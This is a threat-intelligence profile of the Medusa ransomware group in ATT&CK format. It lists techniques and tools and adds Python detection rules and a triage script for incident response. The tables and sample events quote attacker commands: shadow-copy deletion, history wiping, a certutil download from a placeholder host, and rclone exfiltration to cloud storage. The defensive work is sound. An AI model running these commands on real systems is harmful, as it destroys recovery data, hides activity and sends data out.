
G1051 Medusa Group

Medusa Group has been active since at least 2021 and initially operated as a closed ransomware group before evolving into a Ransomware-as-a-Service (RaaS) operation. Some reporting indicates that certain attacks may still be conducted directly by the ransomware's core developers. Public sources have also referred to the group as "Spearwing" or "Medusa Actors."[1][3] Medusa Group employs living-off-the-land techniques, frequently leveraging publicly available tools and common remote management software to conduct operations. The group engages in double extortion, exfiltrating data prior to encryption and threatening to publish the stolen information if ransom demands are not met.[4] For initial access, Medusa Group has exploited publicly known vulnerabilities, conducted phishing campaigns, and used credentials or access purchased from Initial Access Brokers (IABs). The group is opportunistic and has targeted a wide range of sectors globally.[2]

ID: G1051
Associated Names: (none listed)
Version: 1.0
Created: 15 October 2025
Last Modified: 24 October 2025

Techniques Used

Domain | ID | Name | Use
Enterprise | T1548 | Abuse Elevation Control Mechanism | -
Enterprise | T1548.002 | Bypass User Account Control | Medusa Group has attempted to bypass UAC through a Component Object Model (COM) interface.[2]
Enterprise | T1087 | Account Discovery | -
Enterprise | T1087.001 | Local Account | Medusa Group has used net user for account discovery.[3]
Enterprise | T1650 | Acquire Access | Medusa Group has purchased user credentials and other sensitive data from Initial Access Brokers (IABs).[5][6][1][2]
Enterprise | T1583 | Acquire Infrastructure | -
Enterprise | T1583.006 | Web Services | Medusa Group has used the file hosting service filemail[.]com to host a zip file containing malicious payloads that facilitated follow-on actions.[5]
Enterprise | T1071 | Application Layer Protocol | -
Enterprise | T1071.001 | Web Protocols | Medusa Group has communicated through reverse or bind shells over port 443 (HTTPS).[1]
Enterprise | T1059 | Command and Scripting Interpreter | -
Enterprise | T1059.001 | PowerShell | Medusa Group has used PowerShell for execution and defense evasion.[6][1][2] Medusa Group has also used PowerShell to run a bitsadmin transfer from a file hosting site.[5]
Enterprise | T1059.003 | Windows Command Shell | Medusa Group has used the Windows Command Prompt to control the system and execute commands, including ingress tool transfer and network and filesystem enumeration.[1]
Enterprise | T1136 | Create Account | -
Enterprise | T1136.002 | Domain Account | Medusa Group has created a domain account within the victim environment.[1]
Enterprise | T1543 | Create or Modify System Process | -
Enterprise | T1543.003 | Windows Service | Medusa Group has used vulnerable or signed drivers to tamper with security solutions on victim devices.[1]
Enterprise | T1486 | Data Encrypted for Impact | Medusa Group has encrypted files with AES-256, appended the extension ".medusa" to encrypted files, and left a ransom note named "!READ_ME_MEDUSA!!!.txt".[5][1][3][4]
Enterprise | T1652 | Device Driver Discovery | Medusa Group has enumerated drivers on the victim device with the driverquery command.[1]
Enterprise | T1573 | Encrypted Channel | -
Enterprise | T1573.002 | Asymmetric Cryptography | Medusa Group has used HTTPS for command and control.[1]
Enterprise | T1585 | Establish Accounts | -
Enterprise | T1585.001 | Social Media Accounts | Medusa Group has created social media accounts, including on Telegram and X, to publicize its activities.[5][6]
Enterprise | T1585.002 | Email Accounts | Medusa Group has created email accounts used in ransom negotiations.[1]
Enterprise | T1567 | Exfiltration Over Web Service | -
Enterprise | T1567.002 | Exfiltration to Cloud Storage | Medusa Group has used Rclone to exfiltrate data from victim environments to cloud storage.[1][3]
Enterprise | T1190 | Exploit Public-Facing Application | Medusa Group has exploited vulnerabilities in public-facing applications to gain initial access to victim organizations.[5][3] Medusa Group has also exploited CVE-2024-1709 in ConnectWise ScreenConnect and CVE-2023-48788 in Fortinet FortiClient EMS for initial access to victim environments.[1]
Enterprise | T1083 | File and Directory Discovery | Medusa Group has searched the victim environment for files to encrypt and exfiltrate.[5][1][4] Medusa Group has also identified files associated with remote management services.[5][1]
Enterprise | T1657 | Financial Theft | Medusa Group has stolen and encrypted victims' data in order to extort ransom payments.[5][6][1][2][3][4]
Enterprise | T1564 | Hide Artifacts | -
Enterprise | T1564.003 | Hidden Window | Medusa Group has used the ShowWindow API function to hide the current window.[4]
Enterprise | T1562 | Impair Defenses | -
Enterprise | T1562.001 | Disable or Modify Tools | Medusa Group has terminated antivirus services using the gaze.exe executable and psexec.exe.[5][1][3] Medusa Group has also issued I/O control codes (IOCTLs) to terminate and delete the processes of identified security tools.[5]
Enterprise | T1562.003 | Impair Command History Logging | Medusa Group has removed the PowerShell command history kept by the PSReadLine module by running the PowerShell command Remove-Item (Get-PSReadlineOption).HistorySavePath.[1]
Enterprise | T1562.004 | Disable or Modify System Firewall | Medusa Group has used PsExec to execute batch scripts that modify firewall settings.[1] Medusa Group has also enabled and modified firewall rules to allow RDP connections for lateral movement and device interaction.[1]
Enterprise | T1070 | Indicator Removal | -
Enterprise | T1070.003 | Clear Command History | Medusa Group has cleared command history by running the PowerShell command Remove-Item (Get-PSReadlineOption).HistorySavePath.[1]
Enterprise | T1070.004 | File Deletion | Medusa Group has deleted previously installed tools.[1]
Enterprise | T1105 | Ingress Tool Transfer | Medusa Group has used certutil, PowerShell, and the Windows command shell to download additional tools, including RMM software.[1] Medusa Group has also engaged in "Bring Your Own Vulnerable Driver" (BYOVD), downloading vulnerable or signed drivers to the victim environment to disable security tools.[1][3]
Enterprise | T1490 | Inhibit System Recovery | Medusa Group has deleted recovery data such as volume shadow copies using vssadmin.exe.[5][1][3][4]
Enterprise | T1559 | Inter-Process Communication | -
Enterprise | T1559.001 | Component Object Model | Medusa Group has leveraged the Component Object Model (COM) to bypass UAC.[2]
Enterprise | T1570 | Lateral Tool Transfer | Medusa Group has used legitimate software such as PDQ Deploy to transfer malicious binaries and tools to other compromised hosts within the target environment.[3]
Enterprise | T1112 | Modify Registry | Medusa Group has modified Registry keys to elevate privileges, maintain persistence, and allow remote access.[1]
Enterprise | T1106 | Native API | Medusa Group has used Windows Native API functions to execute payloads.[4]
Enterprise | T1046 | Network Service Discovery | Medusa Group has used living-off-the-land (LOTL) binaries to perform network enumeration.[1] Medusa Group has also used the publicly available SoftPerfect Network Scanner (netscan.exe) to discover device hostnames and network services.[3]
Enterprise | T1135 | Network Share Discovery | Medusa Group has identified network shares using cmd.exe /c net share.[1]
Enterprise | T1027 | Obfuscated Files or Information | -
Enterprise | T1027.002 | Software Packing | Medusa Group has packed the code of dropped kernel drivers with the packer ASM Guard.[5]
Enterprise | T1027.010 | Command Obfuscation | Medusa Group has obfuscated PowerShell scripts with Base64 encoding.[1] Medusa Group has also obfuscated the code of dropped kernel drivers with Safengine Shielden, which mutates the code and executes it through an embedded virtual machine interpreter.[5]
Enterprise | T1588 | Obtain Capabilities | -
Enterprise | T1588.002 | Tool | Medusa Group has obtained and used numerous RMM tools, along with publicly available scanning tools.[5][1][3] Medusa Group has used tools such as Advanced IP Scanner and SoftPerfect Network Scanner for user, system, and network discovery.[1] Medusa Group has also acquired tools for command and control and defense evasion, including the tunneling tools Ligolo and Cloudflared.[1]
Enterprise | T1003 | OS Credential Dumping | -
Enterprise | T1003.001 | LSASS Memory | Medusa Group has used Mimikatz to dump LSASS memory and harvest credentials.[1]
Enterprise | T1003.003 | NTDS | Medusa Group has accessed the ntds.dit file to dump credentials.[3]
Enterprise | T1069 | Permission Groups Discovery | -
Enterprise | T1069.002 | Domain Groups | Medusa Group has used the net group command to query domain groups within the victim environment.[1]
Enterprise | T1057 | Process Discovery | Medusa Group has used a hard-coded list of security tool process names to identify processes, which are then terminated via the undocumented IOCTL code 0x222094.[5]
Enterprise | T1090 | Proxy | -
Enterprise | T1090.003 | Multi-hop Proxy | Medusa Group has used Tor nodes for communications.[5][6][3]
Enterprise | T1219 | Remote Access Tools | Medusa Group has used remote access software for lateral movement and data exfiltration.[5][1][3][4] Medusa Group is also known to use remote access software such as AnyDesk, Atera, ConnectWise, eHorus, N-able, PDQ Deploy, PDQ Inventory, SimpleHelp, and Splashtop.[1]
Enterprise | T1021 | Remote Services | -
Enterprise | T1021.001 | Remote Desktop Protocol | Medusa Group has used RDP for lateral movement and data exfiltration.[1] Medusa Group has also used the Windows executable mstsc.exe for RDP sessions via the command mstsc.exe /v:{hostname/ip}.[1]
Enterprise | T1018 | Remote System Discovery | Medusa Group has used PDQ Inventory to inventory the endpoints on the network.[3]
Enterprise | T1505 | Server Software Component | -
Enterprise | T1505.003 | Web Shell | Medusa Group has deployed web shells on an exploited Microsoft Exchange Server.[5]
Enterprise | T1489 | Service Stop | Medusa Group has terminated services related to backups, security, databases, communication, file sharing, and websites.[1][3][4]
Enterprise | T1072 | Software Deployment Tools | Medusa Group has used software deployment and management solutions, including BigFix and PDQ Deploy, to deploy its encryption payload.[1]
Enterprise | T1518 | Software Discovery | -
Enterprise | T1518.001 | Security Software Discovery | Medusa Group has identified security solutions on the victim device for termination or deletion using hard-coded lists of strings containing security product executable names.[5]
Enterprise | T1608 | Stage Capabilities | -
Enterprise | T1608.002 | Upload Tool | Medusa Group has used the file hosting service filemail[.]com to host a zip file containing an RMM tool such as ConnectWise.[5]
Enterprise | T1553 | Subvert Trust Controls | -
Enterprise | T1553.002 | Code Signing | Medusa Group has used vulnerable or signed drivers to kill or delete services associated with endpoint detection and response (EDR) tools.[1]
Enterprise | T1218 | System Binary Proxy Execution | -
Enterprise | T1218.014 | MMC | Medusa Group has used the Microsoft Management Console (MMC) to facilitate lateral movement and interact with victim devices locally or remotely via the command mmc.exe compmgmt.msc /computer:{hostname/ip}.[1]
Enterprise | T1082 | System Information Discovery | Medusa Group has used cmd.exe to gather system information via cmd.exe /c systeminfo.[1]
Enterprise | T1016 | System Network Configuration Discovery | Medusa Group has obtained host network details with the command cmd.exe /c ipconfig /all.[1]
Enterprise | T1033 | System Owner/User Discovery | Medusa Group has used PsExec to execute quser and discover user session information.[3]
Enterprise | T1569 | System Services | -
Enterprise | T1569.002 | Service Execution | Medusa Group has used PsExec to execute scripts and commands within victim environments.[5][1][3] Medusa Group has also used the Windows utility Robocopy to locate and copy data for exfiltration.[3]
Enterprise | T1529 | System Shutdown/Reboot | Medusa Group has manually powered off virtual machines and encrypted them.[1]
Enterprise | T1078 | Valid Accounts | Medusa Group has used compromised legitimate local and domain accounts within the victim environment for remote access and lateral movement, sometimes in combination with PsExec.[1]
Enterprise | T1047 | Windows Management Instrumentation | Medusa Group has used Windows Management Instrumentation to query system information.[5][1][2]
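Most of the rows above quote the exact living-off-the-land command lines reported for the group, which makes them directly usable as process-creation detections. The following is an added example (not code from MITRE ATT&CK or from the cited reports) that encodes those command lines as rules, tags each rule with the technique ID from the table, and runs them over constructed sample events shaped like Sysmon Event ID 1 / Security Event ID 4688 records. The hostnames, user names, URLs, share paths and event field names are assumptions; the command patterns (vssadmin shadow deletion, the PSReadLine history removal, certutil and bitsadmin downloads, mstsc /v:, mmc compmgmt.msc /computer:, net share/user/group, driverquery, PsExec-launched quser, Rclone and netscan.exe) are the ones named in the table.

```python
"""Command-line detections for the living-off-the-land activity listed above.

Added example: this is not code from MITRE ATT&CK or from the cited reports.
The sample events below are constructed to look like Sysmon Event ID 1 /
Security 4688 process-creation records, reduced to the fields the rules need.
"""
import re
from dataclasses import dataclass

# Each rule: ATT&CK technique ID from the table above, a short name, and a
# regex applied to the full command line (case-insensitive).
RULES = [
    ("T1070.003", "PSReadLine history removal",
     r"Remove-Item\s+\(Get-PSReadLineOption\)\.HistorySavePath"),
    ("T1490", "Shadow copy deletion via vssadmin",
     r"\bvssadmin(\.exe)?\s+delete\s+shadows\b"),
    ("T1105", "certutil used as a downloader",
     r"\bcertutil(\.exe)?\b.*\s-urlcache\b.*\bhttps?://"),
    ("T1105", "bitsadmin transfer from a remote host",
     r"\bbitsadmin(\.exe)?\s+/transfer\b.*\bhttps?://"),
    ("T1021.001", "mstsc launched against a specific host",
     r"\bmstsc(\.exe)?\s+/v:\S+"),
    ("T1218.014", "MMC Computer Management against a remote host",
     r"\bmmc(\.exe)?\s+compmgmt\.msc\s+/computer:\S+"),
    ("T1135", "Network share enumeration",
     r"\bnet(1)?(\.exe)?\s+share\b"),
    ("T1087.001", "Local account enumeration",
     r"\bnet(1)?(\.exe)?\s+user\b"),
    ("T1069.002", "Domain group enumeration",
     r"\bnet(1)?(\.exe)?\s+group\b"),
    ("T1652", "Driver enumeration via driverquery",
     r"\bdriverquery(\.exe)?\b"),
    ("T1033", "quser run through PsExec",
     r"\bpsexec(64)?(\.exe)?\b.*\bquser\b"),
    ("T1567.002", "Rclone invoked with a copy/sync/move verb",
     r"\brclone(\.exe)?\s+(copy|sync|move)\b"),
    ("T1046", "SoftPerfect Network Scanner",
     r"\bnetscan(\.exe)?\b"),
]
COMPILED = [(tid, name, re.compile(rx, re.IGNORECASE)) for tid, name, rx in RULES]


@dataclass(frozen=True)
class Hit:
    technique: str
    name: str
    host: str
    user: str
    command_line: str


def match_event(event: dict) -> list[Hit]:
    """Return every rule the event's command line matches (an event may hit several)."""
    cmd = event.get("CommandLine", "")
    return [Hit(tid, name, event.get("Computer", "?"), event.get("User", "?"), cmd)
            for tid, name, rx in COMPILED if rx.search(cmd)]


def scan(events) -> list[Hit]:
    """Run every rule over every event and return the hits in event order."""
    hits = []
    for ev in events:
        hits.extend(match_event(ev))
    return hits


# Constructed sample events (not real telemetry). Command lines mirror the
# ones quoted in the technique table; hostnames, users, paths and URLs are invented.
SAMPLE_EVENTS = [
    {"Computer": "FS01", "User": "CORP\\svc_backup",
     "CommandLine": "powershell.exe -nop -c \"Remove-Item (Get-PSReadlineOption).HistorySavePath\""},
    {"Computer": "FS01", "User": "CORP\\svc_backup",
     "CommandLine": "vssadmin.exe delete shadows /all /quiet"},
    {"Computer": "WS22", "User": "CORP\\jdoe",
     "CommandLine": "certutil.exe -urlcache -split -f https://files.example.invalid/a.zip a.zip"},
    {"Computer": "WS22", "User": "CORP\\jdoe",
     "CommandLine": "mstsc.exe /v:10.0.0.25"},
    {"Computer": "WS22", "User": "CORP\\jdoe",
     "CommandLine": "mmc.exe compmgmt.msc /computer:FS01"},
    {"Computer": "DC01", "User": "CORP\\Administrator",
     "CommandLine": "cmd.exe /c net share"},
    {"Computer": "DC01", "User": "CORP\\Administrator",
     "CommandLine": "PsExec.exe \\\\WS22 -s quser"},
    {"Computer": "FS01", "User": "CORP\\svc_backup",
     "CommandLine": "rclone.exe copy D:\\Shares remote:bucket --transfers 8"},
    # Benign noise that must not match:
    {"Computer": "WS22", "User": "CORP\\jdoe",
     "CommandLine": "net use Z: \\\\FS01\\Public"},
    {"Computer": "WS22", "User": "CORP\\jdoe",
     "CommandLine": "powershell.exe -c Get-Process"},
]

if __name__ == "__main__":
    for h in scan(SAMPLE_EVENTS):
        print(f"{h.technique:<10} {h.host:<5} {h.user:<20} {h.name}: {h.command_line}")
```

The benign `net use` line in the sample deliberately shares a prefix with `net user`; the `\b` anchors keep the T1087.001 rule from firing on it. Command-line auditing has to be enabled for 4688 to carry the CommandLine field at all, and a T1490 or T1070.003 hit should be escalated immediately, since shadow-copy deletion and history wiping are late-stage activity in the pattern described above rather than discovery.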

Software

ID | Name | Use | Techniques
S0160 | certutil | Medusa Group has used certutil to download additional tools within victim environments.[1] | Archive Collected Data: Archive via Utility; Deobfuscate/Decode Files or Information; Ingress Tool Transfer; Subvert Trust Controls: Install Root Certificate
S1244 | Medusa Ransomware | Medusa Group has used Medusa Ransomware for ransomware activities.[5][1][3][4] | Command and Scripting Interpreter: Windows Command Shell; Command and Scripting Interpreter: PowerShell; Create or Modify System Process: Windows Service; Data Encrypted for Impact; Deobfuscate/Decode Files or Information; File and Directory Discovery; Hide Artifacts: Hidden Window; Impair Defenses: Disable or Modify Tools; Indicator Removal: File Deletion; Inhibit System Recovery; Inter-Process Communication; Local Storage Discovery; Native API; Network Share Discovery; Obfuscated Files or Information: Encrypted/Encoded File; Process Discovery; Selective Exclusion; Service Stop; Software Discovery: Security Software Discovery; System Information Discovery; System Service Discovery; System Time Discovery
S0002 | Mimikatz | Medusa Group has used Mimikatz to dump LSASS for credential harvesting.[1] | Access Token Manipulation: SID-History Injection; Account Manipulation; Boot or Logon Autostart Execution: Security Support Provider; Credentials from Password Stores; Credentials from Password Stores: Credentials from Web Browsers; Credentials from Password Stores: Windows Credential Manager; OS Credential Dumping: DCSync; OS Credential Dumping: Security Account Manager; OS Credential Dumping: LSASS Memory; OS Credential Dumping: LSA Secrets; Rogue Domain Controller; Steal or Forge Authentication Certificates; Steal or Forge Kerberos Tickets: Golden Ticket; Steal or Forge Kerberos Tickets: Silver Ticket; Unsecured Credentials: Private Keys; Use Alternate Authentication Material: Pass the Hash; Use Alternate Authentication Material: Pass the Ticket
S0029 | PsExec | Medusa Group has used PsExec to facilitate execution, lateral movement, defense evasion, and exfiltration.[1] | Create Account: Domain Account; Create or Modify System Process: Windows Service; Lateral Tool Transfer; Remote Services: SMB/Windows Admin Shares; System Services: Service Execution
S1040 | Rclone | Medusa Group has used Rclone to exfiltrate data from victim environments.[1][3] | Archive Collected Data: Archive via Utility; Data Transfer Size Limits; Exfiltration Over Alternative Protocol: Exfiltration Over Asymmetric Encrypted Non-C2 Protocol; Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol; Exfiltration Over Web Service: Exfiltration to Cloud Storage; File and Directory Discovery
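The T1486 row and the S1244 Medusa Ransomware entry give the on-disk artifacts of an encryption run: the ".medusa" extension appended to encrypted files and the "!READ_ME_MEDUSA!!!.txt" note. The following is an added example, not code from MITRE ATT&CK or from the cited reports, of a triage walk that scopes an encryption run from those two markers and additionally flags high-entropy files that carry no marker extension (AES-256 output is close to 8 bits of entropy per byte, so a renamed or partially processed file still stands out). The entropy threshold, the per-file read size and the constructed directory tree are assumptions.

```python
"""Filesystem triage for the encryption artifacts described in the T1486 row.

Added example, not code from MITRE ATT&CK or the cited reports. The marker
extension and note name come from the technique table; the threshold, the
read size and the sample directory tree are assumptions made for this example.
"""
import math
import os
import tempfile
from collections import Counter
from pathlib import Path

ENCRYPTED_EXT = ".medusa"                 # appended to encrypted files (T1486 row)
RANSOM_NOTE = "!READ_ME_MEDUSA!!!.txt"   # ransom note name (T1486 row)
ENTROPY_THRESHOLD = 7.5                   # bits per byte; assumption, AES output is ~7.95+
SAMPLE_BYTES = 64 * 1024                  # read at most this much per file for the entropy check


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte (0.0 for empty input, 8.0 for uniform bytes)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def triage(root) -> dict:
    """Walk root and summarise ransomware artifacts for scoping an incident.

    Returns the count of files carrying the marker extension, the ransom notes
    found, high-entropy files that lack the marker (possible renamed payload or
    an interrupted run), and the directories touched by the marked artifacts.
    """
    result = {"encrypted": 0, "notes": [], "high_entropy_unmarked": [], "dirs_hit": set()}
    for path in Path(root).rglob("*"):
        if not path.is_file():
            continue
        if path.name == RANSOM_NOTE:
            result["notes"].append(str(path))
            result["dirs_hit"].add(str(path.parent))
            continue
        if path.suffix.lower() == ENCRYPTED_EXT:
            result["encrypted"] += 1
            result["dirs_hit"].add(str(path.parent))
            continue
        # Unmarked file: sample the head and flag it only if it looks like ciphertext.
        with open(path, "rb") as f:
            head = f.read(SAMPLE_BYTES)
        if len(head) >= 256 and shannon_entropy(head) >= ENTROPY_THRESHOLD:
            result["high_entropy_unmarked"].append(str(path))
    result["dirs_hit"] = sorted(result["dirs_hit"])
    return result


def build_sample_tree() -> str:
    """Create a constructed directory tree that mimics a partially encrypted share."""
    root = tempfile.mkdtemp(prefix="medusa_triage_")
    share = Path(root, "Finance")
    share.mkdir()
    (share / "Q3.xlsx.medusa").write_bytes(os.urandom(4096))      # constructed "encrypted" file
    (share / "budget.docx.medusa").write_bytes(os.urandom(4096))  # constructed "encrypted" file
    (share / RANSOM_NOTE).write_text("constructed note text\n")
    untouched = Path(root, "Public")
    untouched.mkdir()
    (untouched / "readme.txt").write_text("plain text, low entropy " * 50)
    (untouched / "archive.bin").write_bytes(os.urandom(4096))     # ciphertext-like, no marker
    return root


if __name__ == "__main__":
    summary = triage(build_sample_tree())
    print(f"encrypted files: {summary['encrypted']}")
    print(f"ransom notes:    {summary['notes']}")
    print(f"unmarked high-entropy files: {summary['high_entropy_unmarked']}")
    print(f"directories hit: {summary['dirs_hit']}")
```

Run it against a mounted image or a read-only share export rather than a live host, and treat the unmarked high-entropy list as a lead rather than a verdict: legitimately compressed or encrypted formats (archives, media, encrypted containers) score just as high, so the directories returned in `dirs_hit` are the reliable scoping signal and the entropy list is where to look for files the marker check missed.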

References